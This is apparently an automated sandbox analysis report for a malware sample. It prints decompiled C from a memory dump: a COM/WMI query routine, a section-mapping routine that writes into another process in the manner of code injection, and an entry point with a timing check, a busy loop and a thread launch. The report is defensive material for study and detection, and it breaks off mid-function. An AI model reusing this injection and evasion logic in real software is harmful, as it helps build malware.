API String ID: 3876402152-2706916422
Opcode ID: 273bfb211393cd56114f3bb121cdd4e9463ea66aaa9619a572f9bb9e4cc855bf
Instruction ID: 25e8395d91437c6831676a43eef48ae52fba165dceb8ee9639bfc079f816c02c
Opcode Fuzzy Hash: 273bfb211393cd56114f3bb121cdd4e9463ea66aaa9619a572f9bb9e4cc855bf
Instruction Fuzzy Hash: 77B16071600704AFE750EB70DD89FEA77E8BF58300F00456AF59AD7292EB74AA04CB21

Uniqueness

Uniqueness Score: -1.00%

Function 0008DB3C, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388
memoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E0008DB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E0008D523(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E00088604(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E0008861A( &_v60, 0xfffffffe);
					E0008D5D7( &_v104);
					return _t320;
				}
				_t165 = E000895E1(_t255, 0x536);
				 *_t328 = 0x609;
				_v52 = _t165;
				_t166 = E000895E1(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E000892E5(_t165);
				_v60 = _t322;
				E000885D5( &_v52);
				E000885D5( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E000895E1(_t255, 0x9e4);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E000885D5( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E0008861A( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E000891E3(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E000891E3(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E00088698(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E00088604( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E0008861A(_t136, 0);
								E0008861A( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E000891E3(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E000895E1(_t281, 0x250);
								 *_t329 = 0x4cc;
								_t217 = E000895E1(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00088604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E000885D5( &_v92);
											E000885D5( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E00089640();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00088604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E000895E1(_t283, 0x219);
										E00089640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E000885D5( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E000891E3(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E0008DA20( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E0008861A( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}

0x0008db45
0x0008db4b
0x0008db52
0x0008db55
0x0008db58
0x0008db5d
0x0008db5f
0x0008db64
0x0008dfac
0x0008dfac
0x0008db71
0x0008db73
0x0008db76
0x0008db79
0x0008df91
0x0008df97
0x0008dfa1
0x00000000
0x0008dfa6
0x0008db84
0x0008db8b
0x0008db92
0x0008db95
0x0008db9a
0x0008db9c
0x0008db9f
0x0008dba2
0x0008dba3
0x0008dbac
0x0008dbb2
0x0008dbb5
0x0008dbbe
0x0008dbc3
0x0008dbc8
0x0008dbdf
0x0008dbec
0x0008dbef
0x0008dbf6
0x0008dbfb
0x0008dc02
0x0008dc07
0x0008dc0e
0x0008dc10
0x0008dc1c
0x0008dc1f
0x0008dc21
0x0008df81
0x0008df82
0x0008df8b
0x00000000
0x0008df8b
0x0008dc27
0x0008dc2a
0x0008dc2d
0x0008dc30
0x0008dc32
0x0008df4d
0x0008df50
0x0008df53
0x0008df55
0x0008df77
0x0008df7c
0x0008df57
0x0008df5a
0x0008df65
0x0008df6c
0x0008df6c
0x00000000
0x00000000
0x00000000
0x00000000
0x0008dc38
0x0008dc38
0x0008dc4a
0x0008dc4d
0x0008dc4f
0x00000000
0x00000000
0x0008dc57
0x0008dc5a
0x0008dc5d
0x0008dc60
0x0008dc63
0x0008dc66
0x00000000
0x00000000
0x0008dc6c
0x0008dc7a
0x0008dc7d
0x0008dc7f
0x0008dc98
0x0008dca7
0x0008dcaf
0x0008dcaf
0x0008dcb2
0x0008dcb9
0x0008dcbd
0x0008dcc3
0x0008dcc5
0x0008df35
0x0008df3b
0x0008df41
0x0008df44
0x0008df44
0x00000000
0x0008df44
0x0008dcd4
0x0008dce8
0x0008dcec
0x0008dcee
0x0008dcf3
0x0008df02
0x0008df08
0x0008df13
0x0008df1e
0x0008df24
0x0008df2a
0x0008df2d
0x00000000
0x0008df2d
0x0008dcf9
0x0008ded0
0x0008ded0
0x0008ded3
0x0008ded6
0x00000000
0x00000000
0x0008dd01
0x0008dd09
0x0008dd10
0x0008dd16
0x0008dd18
0x00000000
0x00000000
0x0008dd21
0x0008dd36
0x0008dd3c
0x0008dd45
0x0008dd48
0x0008dd4b
0x0008dd4d
0x0008dec3
0x0008dec6
0x0008decf
0x0008decf
0x00000000
0x0008decf
0x0008dd5d
0x0008dd60
0x0008dd67
0x0008dd6d
0x0008dd70
0x0008dd73
0x0008dd76
0x0008dd79
0x0008ddb5
0x0008ddb5
0x0008ddb8
0x0008de64
0x0008de78
0x0008de88
0x0008de8c
0x0008de8e
0x0008dea5
0x0008dea9
0x0008deb2
0x0008debd
0x00000000
0x0008debd
0x0008de94
0x0008de95
0x0008de9a
0x0008de9a
0x0008de9c
0x0008de9d
0x0008dea2
0x00000000
0x0008dea2
0x0008ddbe
0x0008ddbe
0x0008ddc1
0x0008de2c
0x0008de40
0x0008de50
0x0008de54
0x0008de56
0x00000000
0x00000000
0x0008de5c
0x0008de5d
0x00000000
0x0008de5d
0x0008ddc3
0x0008ddc3
0x0008ddc6
0x00000000
0x00000000
0x0008ddc8
0x0008ddcb
0x00000000
0x00000000
0x0008ddcd
0x0008ddcd
0x0008ddd3
0x0008ddef
0x0008ddfe
0x0008de07
0x0008de0c
0x0008de0f
0x0008de15
0x0008de15
0x0008de1a
0x0008de26
0x00000000
0x0008de26
0x0008ddd8
0x00000000
0x0008ddd8
0x0008dd7b
0x0008dda2
0x0008dda7
0x0008ddac
0x0008ddae
0x0008ddae
0x00000000
0x0008ddac
0x0008dd7d
0x0008dd7d
0x0008dd80
0x00000000
0x00000000
0x0008dd86
0x0008dd86
0x0008dd89
0x00000000
0x00000000
0x0008dd8f
0x0008dd8f
0x0008dd92
0x00000000
0x00000000
0x0008dd98
0x0008dd9b
0x00000000
0x00000000
0x0008dd9d
0x00000000
0x0008dd9d
0x0008dedf
0x0008dee5
0x0008deeb
0x0008deee
0x0008def1
0x0008def1
0x0008def4
0x0008def5
0x0008def8
0x0008defa
0x00000000
0x00000000
0x0008df4a
0x0008df4a
0x00000000
0x0008df4a
0x0008dc81
0x0008dc87
0x00000000
0x0008dc87
0x0008df47
0x00000000
0x0008dbca
0x0008dbcf
0x0008dbd4
0x00000000
0x0008dbd8

APIs

Part of subcall function 0008D523: CoInitializeEx.OLE32(00000000,00000000), ref: 0008D536
Part of subcall function 0008D523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0008D547
Part of subcall function 0008D523: CoCreateInstance.OLE32(0009B848,00000000,00000001,0009B858,?), ref: 0008D55E
Part of subcall function 0008D523: SysAllocString.OLEAUT32(00000000), ref: 0008D569
Part of subcall function 0008D523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0008D594

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

SysAllocString.OLEAUT32(00000000), ref: 0008DBE5
SysAllocString.OLEAUT32(00000000), ref: 0008DBF9
SysFreeString.OLEAUT32(?), ref: 0008DF82
SysFreeString.OLEAUT32(?), ref: 0008DF8B

Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660

Strings

FALSE, xrefs: 0008DDAE
TRUE, xrefs: 0008DDA7

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
String ID: FALSE$TRUE
API String ID: 1290676130-1412513891
Opcode ID: 14469509326b1245f60a3822b604f0d2155a7e129896877e627dd39ddefd1d86
Instruction ID: 1b20700aac11c4dae470c7e010e7ba276413c48b0cffd0f81d1503e5e528a265
Opcode Fuzzy Hash: 14469509326b1245f60a3822b604f0d2155a7e129896877e627dd39ddefd1d86
Instruction Fuzzy Hash: 58E15E71E00219AFDF54FFA4C985EEEBBB9FF48310F14815AE545AB292DB31A901CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0008C6C0, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 200
registryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E0008C6C0(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				struct HINSTANCE__* _v40;
				char _v44;
				char _v56;
				char _v72;
				struct _WNDCLASSEXA _v120;
				intOrPtr _t69;
				intOrPtr _t71;
				intOrPtr _t75;
				intOrPtr _t80;
				intOrPtr _t92;
				intOrPtr _t95;
				intOrPtr _t96;
				struct HWND__* _t106;
				intOrPtr* _t113;
				struct HINSTANCE__* _t116;
				intOrPtr _t120;
				intOrPtr _t126;
				intOrPtr _t131;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr _t139;
				char _t140;
				intOrPtr _t141;

				_t69 =  *0x9e688; // 0xb0000
				_t126 = __ecx;
				_t134 = __edx;
				_t116 = 0;
				_v36 = __edx;
				_v16 = 0;
				_v44 = 0;
				_v40 = 0;
				_v12 = 0;
				_v8 = 0;
				_v24 = 0;
				_v20 = __ecx;
				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
					E0008E23E(0x1f4);
					_t116 = 0;
				}
				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_v28 = _t116;
				if( *_t113 != 0x4550) {
					L12:
					if(_v8 != 0) {
						_t75 =  *0x9e780; // 0x0
						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
						_v8 = _v8 & 0x00000000;
					}
					L14:
					if(_v12 != 0) {
						_t136 =  *0x9e780; // 0x0
						 *((intOrPtr*)(_t136 + 0x10))(GetCurrentProcess(), _v12);
					}
					if(_v16 != 0) {
						_t71 =  *0x9e780; // 0x0
						 *((intOrPtr*)(_t71 + 0x20))(_v16);
					}
					return _v8;
				}
				_push(_t116);
				_push(0x8000000);
				_v44 =  *((intOrPtr*)(_t113 + 0x50));
				_push(0x40);
				_push( &_v44);
				_push(_t116);
				_push(0xe);
				_push( &_v16);
				_t80 =  *0x9e780; // 0x0
				if( *((intOrPtr*)(_t80 + 0xc))() < 0) {
					goto L12;
				}
				_v120.style = 0xb;
				_v120.cbSize = 0x30;
				_v120.lpszClassName =  &_v56;
				asm("movsd");
				_v120.lpfnWndProc = DefWindowProcA;
				asm("movsd");
				asm("movsd");
				asm("movsb");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_v120.cbWndExtra = 0;
				_v120.lpszMenuName = 0;
				_v120.cbClsExtra = 0;
				_v120.hInstance = 0;
				if(RegisterClassExA( &_v120) != 0) {
					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
					if(_t106 != 0) {
						DestroyWindow(_t106);
						UnregisterClassA( &_v56, 0);
					}
				}
				_t139 =  *0x9e780; // 0x0
				_push(0x40);
				_push(0);
				_push(2);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v12);
				_push(GetCurrentProcess());
				_push(_v16);
				if( *((intOrPtr*)(_t139 + 0x14))() < 0) {
					_t126 = _v20;
					goto L12;
				} else {
					_push(0x40);
					_push(0);
					_push(2);
					_push( &_v24);
					_push(0);
					_push(0);
					_push(0);
					_t126 = _v20;
					_push( &_v8);
					_t92 =  *0x9e780; // 0x0
					_push(_t126);
					_push(_v16);
					if( *((intOrPtr*)(_t92 + 0x14))() < 0) {
						goto L12;
					}
					_t140 = E00088669( *0x9e688, 0x1ac4);
					_v32 = _t140;
					if(_t140 == 0) {
						goto L12;
					}
					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
					_t95 =  *0x9e684; // 0xe9f8f0
					_t96 =  *((intOrPtr*)(_t95 + 0x54))(_t126, 0, 0x1ac4, 0x1000, 4);
					_t120 =  *0x9e684; // 0xe9f8f0
					_t131 = _t96;
					 *((intOrPtr*)(_t120 + 0x20))(_v20, _t131, _t140, 0x1ac4,  &_v28);
					E0008861A( &_v32, 0x1ac4);
					_t141 =  *0x9e688; // 0xb0000
					 *0x9e688 = _t131;
					E000886E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
					E0008C63F(_v12, _v8, _v36);
					 *0x9e688 = _t141;
					goto L14;
				}
			}

0x0008c6c6
0x0008c6cd
0x0008c6cf
0x0008c6d1
0x0008c6d3
0x0008c6d6
0x0008c6d9
0x0008c6dc
0x0008c6df
0x0008c6e2
0x0008c6e5
0x0008c6ef
0x0008c6f2
0x0008c6f9
0x0008c6fe
0x0008c6fe
0x0008c704
0x0008c706
0x0008c70f
0x0008c8b5
0x0008c8b9
0x0008c8be
0x0008c8c4
0x0008c8c7
0x0008c8c7
0x0008c8cb
0x0008c8d0
0x0008c8d5
0x0008c8e2
0x0008c8e2
0x0008c8eb
0x0008c8ed
0x0008c8f5
0x0008c8f5
0x0008c8fc
0x0008c8fc
0x0008c718
0x0008c719
0x0008c71e
0x0008c724
0x0008c726
0x0008c727
0x0008c728
0x0008c72d
0x0008c72e
0x0008c738
0x00000000
0x00000000
0x0008c743
0x0008c74d
0x0008c757
0x0008c75a
0x0008c760
0x0008c767
0x0008c768
0x0008c769
0x0008c772
0x0008c773
0x0008c774
0x0008c776
0x0008c779
0x0008c77c
0x0008c77f
0x0008c782
0x0008c78e
0x0008c7b0
0x0008c7b8
0x0008c7bb
0x0008c7c6
0x0008c7c6
0x0008c7b8
0x0008c7cc
0x0008c7d5
0x0008c7d7
0x0008c7d8
0x0008c7da
0x0008c7db
0x0008c7dc
0x0008c7dd
0x0008c7e1
0x0008c7e8
0x0008c7e9
0x0008c7f1
0x0008c8b2
0x00000000
0x0008c7f7
0x0008c7f7
0x0008c7f9
0x0008c7fa
0x0008c7ff
0x0008c800
0x0008c801
0x0008c802
0x0008c803
0x0008c809
0x0008c80a
0x0008c80f
0x0008c810
0x0008c818
0x00000000
0x00000000
0x0008c82e
0x0008c830
0x0008c837
0x00000000
0x00000000
0x0008c848
0x0008c84e
0x0008c856
0x0008c859
0x0008c85f
0x0008c86f
0x0008c87b
0x0008c880
0x0008c886
0x0008c896
0x0008c8a2
0x0008c8aa
0x00000000
0x0008c8aa

APIs

RegisterClassExA.USER32 ref: 0008C785
CreateWindowExA.USER32 ref: 0008C7B0
DestroyWindow.USER32 ref: 0008C7BB
UnregisterClassA.USER32(?,00000000), ref: 0008C7C6
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0008C7E2
GetCurrentProcess.KERNEL32(00000000), ref: 0008C8DB

Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660

Strings

0, xrefs: 0008C74D
cdcdwqwqwq, xrefs: 0008C76A
sadccdcdsasa, xrefs: 0008C73E

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: ClassCurrentProcessWindow$CreateDestroyFreeHeapRegisterUnregister
String ID: 0$cdcdwqwqwq$sadccdcdsasa
API String ID: 3082384575-2319545179
Opcode ID: 5474bce5d18d4943309ca91fb3254532eb6dfdcf916d9e8241832134b147adef
Instruction ID: d3e88f71527c21399528f0c4bf061e6e508ee729baa66594f0f525f79852064d
Opcode Fuzzy Hash: 5474bce5d18d4943309ca91fb3254532eb6dfdcf916d9e8241832134b147adef
Instruction Fuzzy Hash: 49712971900249EFEB10DF95DC49EEEBBB9FB89710F14406AF605A7290DB74AE04CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00085F82, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 78%

			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
				char _v8;
				char _v16;
				short _v144;
				short _v664;
				void* _t19;
				struct HINSTANCE__* _t22;
				long _t23;
				long _t24;
				char* _t27;
				WCHAR* _t32;
				long _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t49;
				int _t53;
				void* _t54;
				intOrPtr* _t55;
				void* _t57;

				_t49 = __edx;
				OutputDebugStringA("Hello qqq");
				if(_a8 != 1) {
					if(_a8 != 0) {
						L12:
						return 1;
					}
					SetLastError(0xaa);
					L10:
					return 0;
				}
				E000885EF();
				_t19 = E0008980C( &_v16);
				_t57 = _t49;
				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
					goto L12;
				} else {
					E00088F78();
					GetModuleHandleA(0);
					_t22 = _a4;
					 *0x9e69c = _t22;
					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
					_t24 = GetLastError();
					if(_t23 != 0 && _t24 != 0x7a) {
						memset( &_v144, 0, 0x80);
						_t55 = _t54 + 0xc;
						_t53 = 0;
						do {
							_t27 = E000895C7(_t53);
							_a8 = _t27;
							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
							E000885C2( &_a8);
							_t53 = _t53 + 1;
						} while (_t53 < 0x2710);
						E00092A5B( *0x9e69c);
						 *_t55 = 0x7c3;
						 *0x9e684 = E0008E1BC(0x9ba28, 0x11c);
						 *_t55 = 0xb4e;
						_t32 = E000895E1(0x9ba28);
						_a8 = _t32;
						_t33 = GetFileAttributesW(_t32);
						_push( &_a8);
						if(_t33 == 0xffffffff) {
							E000885D5();
							_v8 = 0;
							_t37 =  *0x9e684; // 0xe9f8f0
							_t38 =  *((intOrPtr*)(_t37 + 0x70))(0, 0, E00085E06, 0, 0,  &_v8);
							 *0x9e6a8 = _t38;
							if(_t38 == 0) {
								goto L10;
							}
							goto L12;
						}
						E000885D5();
					}
					goto L10;
				}
			}

0x00085f82
0x00085f92
0x00085f9c
0x000860d0
0x000860c3
0x00000000
0x000860c5
0x000860d7
0x00086098
0x00000000
0x00086098
0x00085fa2
0x00085faa
0x00085fb1
0x00085fb3
0x00000000
0x00085fc6
0x00085fc6
0x00085fcc
0x00085fd2
0x00085fe2
0x00085fe7
0x00085fef
0x00085ff7
0x00086013
0x00086018
0x0008601b
0x0008601d
0x0008601f
0x0008602c
0x00086035
0x0008603e
0x00086043
0x00086044
0x00086052
0x0008605c
0x0008606d
0x00086072
0x00086079
0x00086080
0x00086083
0x0008608f
0x00086090
0x0008609c
0x000860a5
0x000860a9
0x000860b7
0x000860ba
0x000860c1
0x00000000
0x00000000
0x00000000
0x000860c1
0x00086092
0x00086097
0x00000000
0x00085ff7

APIs

OutputDebugStringA.KERNEL32(Hello qqq), ref: 00085F92
SetLastError.KERNEL32(000000AA), ref: 000860D7

Part of subcall function 000885EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8

Part of subcall function 0008980C: GetSystemTimeAsFileTime.KERNEL32(?,?,00085FAF), ref: 00089819
Part of subcall function 0008980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00089839

GetModuleHandleA.KERNEL32(00000000), ref: 00085FCC
GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 00085FE7
GetLastError.KERNEL32 ref: 00085FEF
memset.MSVCRT ref: 00086013
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 00086035
GetFileAttributesW.KERNEL32(00000000), ref: 00086083

Strings

Hello qqq, xrefs: 00085F8D

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: File$ErrorLastModuleTime$AttributesByteCharCreateDebugHandleHeapMultiNameOutputStringSystemUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
String ID: Hello qqq
API String ID: 1203100507-3610097158
Opcode ID: 8b96a12faa54738855b03958d39a9c9ad27c69214fa689d017f1ccf1e08c0267
Instruction ID: 5d8fc15084eb67a1e967e79224f0c4bd4c543ae9b3caa409572413b5ae1d139a
Opcode Fuzzy Hash: 8b96a12faa54738855b03958d39a9c9ad27c69214fa689d017f1ccf1e08c0267
Instruction Fuzzy Hash: AD31A771900544ABEB64BF30DC49EAF37B8FB81720F10852AF495C6292DF389A49DF21

Uniqueness

Uniqueness Score: -1.00%

Function 0008E668, Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 305
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0008E668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				int _v76;
				void* _v80;
				intOrPtr _v100;
				int _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char* _v120;
				void _v124;
				char _v140;
				void _v396;
				void _v652;
				intOrPtr _t105;
				intOrPtr _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t131;
				char _t133;
				intOrPtr _t136;
				char _t138;
				char _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				intOrPtr _t154;
				intOrPtr _t158;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr _t166;
				intOrPtr _t172;
				intOrPtr _t176;
				void* _t183;
				void* _t185;
				intOrPtr _t186;
				char _t195;
				intOrPtr _t203;
				intOrPtr _t204;
				signed int _t209;
				void _t212;
				intOrPtr _t213;
				void* _t214;
				intOrPtr _t216;
				char _t217;
				intOrPtr _t218;
				signed int _t219;
				signed int _t220;
				void* _t221;

				_v40 = _v40 & 0x00000000;
				_v24 = 4;
				_v36 = 1;
				_t214 = __edx;
				memset( &_v396, 0, 0x100);
				memset( &_v652, 0, 0x100);
				_v64 = E000895C7(0x85b);
				_v60 = E000895C7(0xdc9);
				_v56 = E000895C7(0x65d);
				_v52 = E000895C7(0xdd3);
				_t105 = E000895C7(0xb74);
				_v44 = _v44 & 0;
				_t212 = 0x3c;
				_v48 = _t105;
				memset( &_v124, 0, 0x100);
				_v116 = 0x10;
				_v120 =  &_v140;
				_v124 = _t212;
				_v108 =  &_v396;
